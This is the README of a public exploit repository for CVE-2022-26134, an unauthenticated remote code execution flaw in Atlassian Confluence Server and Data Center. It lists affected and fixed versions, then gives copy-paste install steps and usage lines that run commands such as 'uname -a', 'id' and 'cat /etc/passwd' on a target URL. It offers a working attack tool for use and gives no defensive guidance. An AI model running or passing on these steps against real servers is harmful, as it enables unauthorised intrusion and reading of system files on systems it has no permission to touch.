/CVE-2022-26134

Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)

Primary LanguagePythonMIT LicenseMIT

CVE-2022-26134

Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability

Summary CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability
in Confluence Server and Data Center
Affected Products Confluence Confluence Server Confluence Data Center
Affected Versions All supported versions of Confluence Server and Data Center are affected.
Confluence Server and Data Center versions after 1.3.0 are affected.
Fixed Versions 7.4.17
7.13.7
7.14.3
7.15.2
7.16.4
7.17.4
7.18.1

How to use:

Copy and Paste in terminal :

git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt

For executing command on vulnerable target :

python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com  id

voter-co-Trim.gif

cyan/